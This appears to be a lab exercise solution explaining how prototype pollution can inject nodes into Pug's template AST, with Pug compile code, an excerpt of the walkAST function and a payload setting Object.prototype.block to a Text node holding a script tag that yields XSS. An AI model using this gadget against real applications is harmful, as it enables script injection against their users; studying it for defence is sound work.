14.5.1
Switch to the Pug templating engine. Discover a mechanism to detect if the target is running Pug using prototype pollution. Using this mechanism, obtain XSS against the target.
Solution
- https://blog.p6.is/AST-Injection/#Pug
- A common way to use a template in Pug is shown below.
- The pug.compile function converts the template string into a template (render) function; the object passed when that function is called supplies the template's local variables (here `msg`).
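const pug = require('pug');

// Template source. `h1= msg` renders the `msg` local as the h1's content.
// NOTE(review): `=` is Pug's escaped buffered-output form and `!=` the
// unescaped one — confirm against the installed Pug version.
const source = `h1= msg`;

// pug.compile turns the source into a render function. Compilation walks the
// template's AST, so anything that can pollute Object.prototype before this
// call runs (e.g. a JSON-merge gadget reachable with `__proto__`) can inject
// nodes into that AST — see the AST-Injection reference above.
const fn = pug.compile(source);

// The locals object supplies the template variables; the result is the HTML.
const html = fn({ msg: 'It works' });
console.log(html); // <h1>It works</h1>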
switch (ast.type) {
case 'NamedBlock':
case 'Block':
ast.nodes = walkAndMergeNodes(ast.nodes);
break;
case 'Case':
case 'Filter':
case 'Mixin':
case 'Tag':
case 'InterpolatedTag':
case 'When':
case 'Code':
case 'While':
if (ast.block) {
ast.block = walkAST(ast.block, before, after, options);
}
break;
...
// Prototype-pollution payload: give every object an inherited `block`
// property holding a Pug Text node. walkAST guards the recursion with a bare
// `if (ast.block)` rather than an own-property check, so any node that has no
// `block` of its own (Tag, Mixin, Case, ...) now appears to have this one and
// it is walked like ordinary template content. The referenced AST-Injection
// write-up reports the Text node's `val` reaching the rendered output
// unescaped, which is the XSS. In a real target this assignment is reached
// through whatever merge/parse gadget the application exposes (typically a
// `__proto__` key in attacker-controlled JSON), not by running this line.
const injectedTextNode = {
  type: 'Text',
  val: '<script>alert(origin)</script>',
};
Object.prototype.block = injectedTextNode;
